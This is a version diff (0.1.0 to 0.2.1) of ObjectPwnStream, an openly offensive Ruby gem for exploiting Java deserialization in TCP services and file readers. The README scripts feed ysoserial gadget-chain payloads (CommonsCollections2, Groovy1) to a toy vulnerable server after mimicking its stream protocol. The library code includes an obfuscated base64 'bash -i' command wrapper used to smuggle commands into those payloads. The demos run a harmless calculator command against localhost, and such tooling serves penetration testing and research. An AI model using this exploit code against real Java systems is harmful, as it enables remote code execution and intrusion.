ObjectPwnStream 0.1.0 → 0.2.1

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: b905811964d789180cbff26100f1b58c98d1988c6f087eba194d7d16ddcc235c
-  data.tar.gz: 225bc15214b8c5f87fb4af9b3798b727d6d2c75874f74d49499255c63cb0d587
+  metadata.gz: a347144ffdcd286655765d02b35f820cf238e5adcd51dac5c99d7b45bbfe27ad
+  data.tar.gz: 99087fbd42c52cacb190587658855f4969264cf97d2b41fe28dd5ab144b5ff30
 SHA512:
-  metadata.gz: 75441eb2eef3c5e70153b983982fa4d00df0e4889b66bbccd332f0a18928c94bf3c944b7ac5ad5eb4e98ae185b44a33665c25926b0437dee2711436e65486daa
-  data.tar.gz: a3e607e834726bb96a97966a7755029447246b80dfae18ff0417c24db6752cc677190d497408ace2f484bd5c13f077b121fe9eab865aab16b61ad972cd1bfce3
+  metadata.gz: cd6baf49d561329eabc2df8f38313bc88ebcf44c9b4d9b6e6a62e9c4e02fa63c9b28ea6c5fae9dffa91a940b6f77156ac57eabd4e14b69d157b77da869e12f47
+  data.tar.gz: 69f5c87cd8c25297861418a2ae7d98d8dcfd6f68ab28d228e1452221107111f9b03c4beee5bb4ee16a61c98384b94a15d32584b72990984c5f5ddf6a933454c1

data/ObjectPwnStream.gemspec

@@ -1,37 +1,39 @@
-# coding: utf-8
-require_relative 'lib/ObjectPwnStream'
-lib = File.expand_path("../lib", __FILE__)
-$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
-
-
-Gem::Specification.new do |spec|
-  spec.name          = "ObjectPwnStream"
-  spec.version       = ObjectPwnStream::VERSION
-  spec.authors       = "hakivvi"
-  spec.email         = "hakivvi@gmail.com"
-
-  spec.summary       = %q{a Ruby implementation for ObjectInputStream and ObjectOutputStream to ease JAVA deserialization exploitation.}
-  spec.description   = %q{a Ruby implementation of Java's ObjectInputStream and ObjectOutputStream, to ease the process of Java deserialization exploitation on custom TCP based network protocols.}
-  spec.homepage      = "https://github.com/hakivvi/ObjectPwnStream"
-  spec.license       = "MIT"
-
-  # Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
-  # to allow pushing to a single host or delete this section to allow pushing to any host.
-  # if spec.respond_to?(:metadata)
-  #   spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
-  # else
-  #   raise "RubyGems 2.0 or newer is required to protect against " \
-  #     "public gem pushes."
-  # end
-
-  spec.files         = `git ls-files -z`.split("\x0").reject do |f|
-    f.match(%r{^(test|spec|features)/})
-  end
-  spec.bindir        = "exe"
-  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
-  spec.require_paths = ["lib"]
-
-  spec.add_development_dependency "bundler"
-  spec.add_development_dependency "rake", "~> 10.0"
-  spec.add_development_dependency "rspec", "~> 3.0"
-end
+# coding: utf-8
+require_relative 'lib/ObjectPwnStream'
+lib = File.expand_path("../lib", __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+
+
+Gem::Specification.new do |spec|
+  spec.name          = "ObjectPwnStream"
+  spec.version       = ObjectPwnStream::VERSION
+  spec.authors       = "hakivvi"
+  spec.email         = "hakivvi@gmail.com"
+
+  spec.summary       = %q{a Ruby implementation for ObjectInputStream and ObjectOutputStream to ease JAVA deserialization exploitation.}
+  spec.description   = %q{a Ruby implementation of Java's ObjectInputStream and ObjectOutputStream, to ease the process of Java deserialization exploitation.}
+  spec.homepage      = "https://github.com/hakivvi/ObjectPwnStream"
+  spec.license       = "MIT"
+
+  spec.required_ruby_version = '>= 3.0.0'
+
+  # Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
+  # to allow pushing to a single host or delete this section to allow pushing to any host.
+  # if spec.respond_to?(:metadata)
+  #   spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
+  # else
+  #   raise "RubyGems 2.0 or newer is required to protect against " \
+  #     "public gem pushes."
+  # end
+
+  spec.files         = `git ls-files -z`.split("\x0").reject do |f|
+    f.match(%r{^(test|spec|features)/})
+  end
+  spec.bindir        = "exe"
+  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
+  spec.require_paths = ["lib"]
+
+  spec.add_development_dependency "bundler"
+  spec.add_development_dependency "rake", ">= 12.3.3"
+  spec.add_development_dependency "rspec", "~> 3.0"
+end

data/README.md

@@ -1,7 +1,10 @@
-<<<<<<< HEAD
 # ObjectPwnStream
 
-a Ruby implementation of Java's `ObjectInputStream` and `ObjectOutputStream`, to ease the process of Java deserialization exploitation on custom TCP based network protocols.
+a Ruby implementation of Java's `ObjectInputStream` and `ObjectOutputStream`, to ease the process of Java deserialization exploitation.
+
+the library is currently able to deliver the serialized payloads to TCP connections (`tcpSocket.getInputStream()`) and files (`FileInputStream()`).
+## Requirements
+- Ruby v3.0.0 or newer
 
 ## Installation
 
@@ -24,12 +27,13 @@ Or install it from main branch:
     $ git clone https://github.com/hakivvi/ObjectPwnStream
     $ cd ObjectPwnStream
     $ bundle install && bundle exec rake install
+
 ## Usage
 the library provides a set of methods to mimic the methods of both `ObjectInputStream` and `ObjectOutputStream`,
 
-the `readObject()` method is not always the first function run on a TCP socket, so you can't just feed the server with your serialized payload or else `java.io.StreamCorruptedException` will be thrown by the server.
+the `readObject()` method is not always the first function run on a `Socket` or a `FileInputStream`, so you can't just feed the server with your serialized payload or else `java.io.StreamCorruptedException` will be thrown by the server.
 
-take this toy server for example, which does read and write a bunch of types before actually calling `readObject()` which the attacker is usually interested in:
+take this [test server](https://github.com/hakivvi/ObjectPwnStream/blob/main/spec/test/ToyServer.java) for example, which does read and write a bunch of types before actually calling `readObject()` which the attacker is usually interested in:
 ```java
                 s = serverSock.accept();
                 System.out.println("[+] Connection accepted from " + s.getInetAddress().getHostAddress() + ":" + s.getPort());
@@ -77,26 +81,49 @@ using `ObjectPwnStream` library, we can do just that:
 ```ruby
 require 'ObjectPwnStream'
 
-pwnStream = ObjectPwnStream::PwnStream.new("127.0.0.1", 9090)
+pwnStream = ObjectPwnStream::PwnStream.new(host: "127.0.0.1", port: 9090)
 pwnStream.connect!
 pwnStream.open_streams!
 pwnStream.read_int
-pwnStream.write_int 0x1337
+pwnStream.write_int(0x1337)
 pwnStream.read_utf
 pwnStream.write_utf "ObjectPwnStream"
 pwnStream.read_short
-pwnStream.write_short 0xabcd
-pwnStream.read_long signed=true
-pwnStream.write_long -12345
+pwnStream.write_short(0xabcd)
+pwnStream.read_long(signed: true)
+pwnStream.write_long(-12345)
 pwnStream.read_object
-pwnStream.ysoserial_generate!("./ysoserial.jar", "CommonsCollections2", "gnome-calculator", encode: true, windows: false)
+pwnStream.ysoserial_generate!("./ysoserial.jar","CommonsCollections2", "gnome-calculator", encode: true, windows: false)
 pwnStream.write_object(ysoserial: true)
 ```
-## Development
+or as a [`FileInputStream`](https://github.com/hakivvi/ObjectPwnStream/blob/main/spec/test/ToyServerFileMode.java):
+```java
+        ObjectInputStream fis = new ObjectInputStream(new FileInputStream("/tmp/to_deserialize_file"));
 
-After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
+        System.out.printf("got a long from the file: %d\n", fis.readLong());
+        try {
+            fis.readObject();
+        } catch(Throwable e){}
+        System.out.println("readObject(): done.");
+```
+to successfully reach `readObject()`, we should provide a valid `long` type first, the [script](https://github.com/hakivvi/ObjectPwnStream/blob/main/spec/test/test_file_mode.rb) will be:
+```ruby
+require 'ObjectPwnStream'
+
+pwnStream = ObjectPwnStream::PwnStream.new(file_path: "/tmp/to_deserialize_file")
+pwnStream.connect!
+pwnStream.open_output_stream!
+pwnStream.write_long(12345)
+pwnStream.ysoserial_generate!("../ysoserial.jar", "Groovy1", "gnome-calculator", encode: true, windows: false)
+pwnStream.write_object(ysoserial: true)
+pwnStream.close!
+```
+## PoC
+
+find a test vulnerable Java server and a Ruby ObjectPwnStream exploit in the [test](https://github.com/hakivvi/ObjectPwnStream/tree/main/spec/test) directory.
+
+![poc](https://user-images.githubusercontent.com/67718634/170808392-1ce8efff-b8c6-4372-8d7a-b20b4fbeadc9.gif)
 
-To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
 
 ## Contributing
 
@@ -108,12 +135,9 @@ The gem is available as open source under the terms of the [MIT License](http://
 
 ## Code of Conduct
 
-Everyone interacting in the ObjectPwnStream project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/ObjectPwnStream/blob/master/CODE_OF_CONDUCT.md).
+Everyone interacting in the ObjectPwnStream project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://opensource.guide/code-of-conduct/).
 
 ## Todo
 
-- document all the functions.
-- support CLI mode.
-=======
-# ObjectPwnStream
->>>>>>> 722378df4eaf6880483a7235cdda15036bd64adb
+- [ ] document all the functions.
+- [ ] support CLI mode.

data/lib/ObjectPwnStream/Errors.rb

@@ -9,7 +9,7 @@ module ObjectPwnStream
     end
 
     class PayloadStreamHeaderError < StandardError
-      def message()="the provided serialized payload has an invalid stream header."
+      def message()="the signed: false serialized payload has an invalid stream header."
     end
 
     class YsoserialGenerateError < StandardError

data/lib/ObjectPwnStream/ObjectInputStream.rb

@@ -10,17 +10,17 @@ module ObjectPwnStream
       check_stream_header(read_stream_header)
     end
 
-    def read_int(signed=false)
+    def read_int(signed: false)
       _, length = read_block_header
       template = (signed ? "l>" : "L>")
-      @socket.read(length).unpack(template)[0]
+      @instream.read(length).unpack(template)[0]
       # to_signed(hex.to_i(16))
     end
 
-    def read_short(signed=false)
+    def read_short(signed: false)
       _, length = read_block_header
       template = (signed ? "s>" : "S>")
-      @socket.read(length).unpack(template)[0]
+      @instream.read(length).unpack(template)[0]
     end
 
     def read_char
@@ -29,75 +29,79 @@ module ObjectPwnStream
 
     def read_chars
       _, length = read_block_header
-      @socket.read(length).unpack("S>*").pack("U*")
+      @instream.read(length).unpack("S>*").pack("U*")
     end
 
     def read_byte
       read_block_header
-      @socket.getbyte
+      @instream.getbyte
     end
 
     def read_bytes
       _, length = read_block_header
-      @socket.read(length).unpack("C*")
+      @instream.read(length).unpack("C*")
     end
 
     def read_utf
       _, block_length = read_block_header
-      length = @socket.read(2).unpack("S>")[0]
-      @socket.read(length).unpack("U*").pack("U*")
+      length = @instream.read(2).unpack("S>")[0]
+      @instream.read(length).unpack("U*").pack("U*")
     end
 
     def read_boolean
       read_block_header
-      bool = @socket.getbyte
+      bool = @instream.getbyte
       bool != 0
     end
 
     def handle_reset
-      check_stream_reset(@socket.getbyte)
+      check_stream_reset(@instream.getbyte)
     end
 
     def read_float
       _, length = read_block_header
-      @socket.read(length).unpack("g")[0]
+      @instream.read(length).unpack("g")[0]
     end
 
     def read_double
       _, length = read_block_header
-      @socket.read(length).unpack("G")[0]
+      @instream.read(length).unpack("G")[0]
     end
 
-    def read_long(signed=false)
+    def read_long(signed: false)
       _, length = read_block_header
       template = signed ? "q>" : "Q>"
-      @socket.read(length).unpack(template)[0]
+      @instream.read(length).unpack(template)[0]
     end
 
     def read_object
-      bytes = [@socket.getbyte]
-      while @socket.ready?
-        bytes << @socket.getbyte
+      unless @file_mode
+        bytes = [@instream.getbyte]
+        while @instream.ready?
+          bytes << @instream.getbyte
+        end
+      else
+        bytes = @instream.each_byte.to_a
       end
       bytes.pack("C*")
     end
 
     private
     def read_stream_header
-      @socket.read(4).unpack("S>S>")
+      @instream.read(4).unpack("S>S>")
     end
 
     def read_block_header
-      block = @socket.getbyte
+      block = @instream.getbyte
       if block.eql?(Constants::TC_BLOCKDATA)
-        length = @socket.getbyte
+        length = @instream.getbyte
       elsif block.eql?(Constants::TC_BLOCKDATALONG)
-        length = @socket.read(4).unpack("I>")[0]
+        length = @instream.read(4).unpack("I>")[0]
       end
       [block, length]
     end
 
-    def check_stream_header(header, provided=nil)
+    def check_stream_header(header, provided: nil)
       unless header.first.eql?(Constants::STREAM_MAGIC) && header.last.eql?(Constants::STREAM_VERSION)
         raise provided.nil? ? Errors::StreamHeaderError : !provided ? Errors::YsoserialPayloadCorruptedError : Errors::PayloadStreamHeaderError
       end

data/lib/ObjectPwnStream/ObjectOutputStream.rb

@@ -10,21 +10,21 @@ module ObjectPwnStream
       write_stream_header(*[Constants::STREAM_MAGIC, Constants::STREAM_VERSION])
     end
 
-    def write_int(v, signed=false)
+    def write_int(v, signed: false)
       length = 4
       write_block_header(Constants::TC_BLOCKDATA, length)
       template = (signed ? "l>" : "L>")
-      @socket.write([v].pack(template))
-      @socket.flush
+      @outstream.write([v].pack(template))
+      @outstream.flush
     end
 
-    def write_short(v, signed=false)
+    def write_short(v, signed: false)
       v &= 0xFFFF
       length = 2
       write_block_header(Constants::TC_BLOCKDATA, length)
       template = (signed ? "s>" : "S>")
-      @socket.write([v].pack(template))
-      @socket.flush
+      @outstream.write([v].pack(template))
+      @outstream.flush
     end
 
     def write_char(char)
@@ -35,86 +35,86 @@ module ObjectPwnStream
       conv = Encoding::Converter.new("utf-8", "utf-16")
       data = conv.convert(str)
       write_block_header(Constants::TC_BLOCKDATA, data.bytesize)
-      @socket.write(data)
-      @socket.flush
+      @outstream.write(data)
+      @outstream.flush
     end
 
     def write_byte(byte)
       write_block_header(Constants::TC_BLOCKDATA, 0x1)
-      @socket.putc(byte)
-      @socket.flush
+      @outstream.putc(byte)
+      @outstream.flush
     end
 
     def write_bytes(bytes)
       write_block_header(Constants::TC_BLOCKDATA, bytes.size)
-      bytes.each {@socket.putc(_1)}
-      @socket.flush
+      bytes.each {@outstream.putc(_1)}
+      @outstream.flush
     end
 
     def write_utf(str)
       utf_size = str.bytesize
       write_block_header(Constants::TC_BLOCKDATA, utf_size+2)
-      @socket.write([utf_size].pack("S>"))
-      @socket.write(str)
-      @socket.flush
+      @outstream.write([utf_size].pack("S>"))
+      @outstream.write(str)
+      @outstream.flush
 
     end
 
     def write_boolean(bool)
       write_block_header(Constants::TC_BLOCKDATA, 1)
-      @socket.putc(bool ? 0x1 : 0x0)
-      @socket.flush
+      @outstream.putc(bool ? 0x1 : 0x0)
+      @outstream.flush
     end
 
     def write_float(float)
       write_block_header(Constants::TC_BLOCKDATA, 4)
-      @socket.write([float].pack("g"))
-      @socket.flush
+      @outstream.write([float].pack("g"))
+      @outstream.flush
     end
 
     def write_double(double)
       write_block_header(Constants::TC_BLOCKDATA, 8)
-      @socket.write([double].pack("G"))
-      @socket.flush
+      @outstream.write([double].pack("G"))
+      @outstream.flush
     end
 
-    def write_long(long, signed=false)
+    def write_long(long, signed: false)
       write_block_header(Constants::TC_BLOCKDATA, 8)
       template = signed ? "q>" : "Q>"
-      @socket.write([long].pack(template))
-      @socket.flush
+      @outstream.write([long].pack(template))
+      @outstream.flush
     end
 
     def reset!
-      @socket.putc(Constants::TC_RESET)
-      @socket.flush
+      @outstream.putc(Constants::TC_RESET)
+      @outstream.flush
     end
 
     def write_object(payload_path: nil, payload: nil, ysoserial: false)
       if ysoserial
-        @socket.write(@payload)
-        @socket.flush
+        @outstream.write(@payload)
+        @outstream.flush
       elsif payload
         ObjectInputStream.check_stream_header(payload[...4].unpack("S>*"), provided: true)
-        @socket.write(payload[4..])
-        @socket.flush
+        @outstream.write(payload[4..])
+        @outstream.flush
       elsif payload_path
         pf = File.open(payload_path, "rb")
         ObjectInputStream.check_stream_header(pf.read(4).unpack("S>*"), provided: true)
-        @socket.write(pf.read(pf.size-4))
-        @socket.flush
+        @outstream.write(pf.read(pf.size-4))
+        @outstream.flush
       end
     end
 
     private
     def write_stream_header(block, version)
-      @socket.write([block, version].pack("S>S>"))
-      @socket.flush
-    end
+      @outstream.write([block, version].pack("S>S>"))
+      @outstream.flush
+  end
 
     def write_block_header(block, length)
-      @socket.write([block, length].pack("CC"))
-      @socket.flush
+      @outstream.write([block, length].pack("CC"))
+      @outstream.flush
     end
   end
 end

data/lib/ObjectPwnStream/PwnStream.rb

@@ -9,35 +9,53 @@ module ObjectPwnStream
       @host = nil
       @port = nil
       @socket = nil
+      @file_path, @file_mode = nil
+      @instream, @outstream = nil
       @payload = nil
 
       include ObjectOutputStream
       include ObjectInputStream
-      attr_reader :socket
-      def initialize(host, port, connect=false)
-        @host = host
-        @port = port.to_i
-        connect! if connect
+      attr_reader :instream, :outstream
+      def initialize(host: nil, port: nil, file_path: nil, connect: false)
+        if file_path.nil?
+          @host = host
+          @port = port.to_i
+          connect! if connect
+        else
+          @file_mode = true
+          @file_path = file_path
+          connect! if connect
+        end
       end
 
       def connect!
-        @socket ||= TCPSocket.open(@host, @port)
+        unless @file_mode
+          @socket ||= TCPSocket.open(@host, @port)
+          @socket.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
+          @socket.sync = true
+          @instream = @outstream = @socket
+        else
+          @outstream ||= File.open(@file_path, 'wb')
+          @instream ||= File.open(@file_path, 'rb')
+          @outstream.sync = true
+        end
       end
 
       def close!
-        @socket.flush
-        @socket.close
-        @socket = nil
+        @outstream.flush
+        @outstream.close
+        @instream.close
+        @socket, @file_path, @instream, @outstream, @file_mode = nil
       end
 
       def ysoserial_generate!(ysoserial_path, gadget, cmd, java_path: nil, encode: false, windows: false)
-        cmd = Utils.exec_encode(cmd, windows) if encode
+        cmd = Utils.exec_encode(cmd, windows: windows) if encode
         ycmd = "#{java_path && '"'}#{java_path || 'java'}#{java_path && '"'} -jar \"#{ysoserial_path}\" #{gadget} \"#{cmd}\""
         stdout = Open3.capture3(ycmd, :binmode => true)[0]
         if stdout.empty?
           raise Errors::YsoserialGenerateError.new(ycmd)
         else
-          ObjectInputStream.check_stream_header(stdout[...4].unpack("S>*"), provided=false)
+          ObjectInputStream.check_stream_header(stdout[...4].unpack("S>*"), provided: false)
           @payload = stdout[4..]
         end
       end
@@ -45,9 +63,8 @@ module ObjectPwnStream
       alias_method :open_input_stream!, :open_input_stream
       alias_method :open_output_stream!, :open_output_stream
       def open_streams!
-        @socket.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
-        open_input_stream
         open_output_stream
+        open_input_stream
       end
   end
 end

data/lib/ObjectPwnStream/Utils.rb

@@ -9,7 +9,7 @@ module ObjectPwnStream
       (int>=mid) ? int - max_unsigned : int
     end
 
-    def exec_encode(cmd, windows=false)
+    def exec_encode(cmd, windows: false)
       !windows ?
         "bash -c {echo,#{[cmd].pack('m0')}}|{base64,-d}|{bash,-i}"
         :

data/lib/ObjectPwnStream.rb

@@ -1,5 +1,5 @@
-require_relative 'ObjectPwnStream/PwnStream'
-
-module ObjectPwnStream
-  VERSION = "0.1.0"
+require_relative 'ObjectPwnStream/PwnStream'
+
+module ObjectPwnStream
+  VERSION = "0.2.1"
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: ObjectPwnStream
 version: !ruby/object:Gem::Version
-  version: 0.1.0
+  version: 0.2.1
 platform: ruby
 authors:
 - hakivvi
@@ -28,16 +28,16 @@ dependencies:
   name: rake
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '10.0'
+        version: 12.3.3
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '10.0'
+        version: 12.3.3
 - !ruby/object:Gem::Dependency
   name: rspec
   requirement: !ruby/object:Gem::Requirement
@@ -53,8 +53,7 @@ dependencies:
       - !ruby/object:Gem::Version
         version: '3.0'
 description: a Ruby implementation of Java's ObjectInputStream and ObjectOutputStream,
-  to ease the process of Java deserialization exploitation on custom TCP based network
-  protocols.
+  to ease the process of Java deserialization exploitation.
 email: hakivvi@gmail.com
 executables: []
 extensions: []
@@ -89,7 +88,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
   requirements:
   - - ">="
     - !ruby/object:Gem::Version
-      version: '0'
+      version: 3.0.0
 required_rubygems_version: !ruby/object:Gem::Requirement
   requirements:
   - - ">="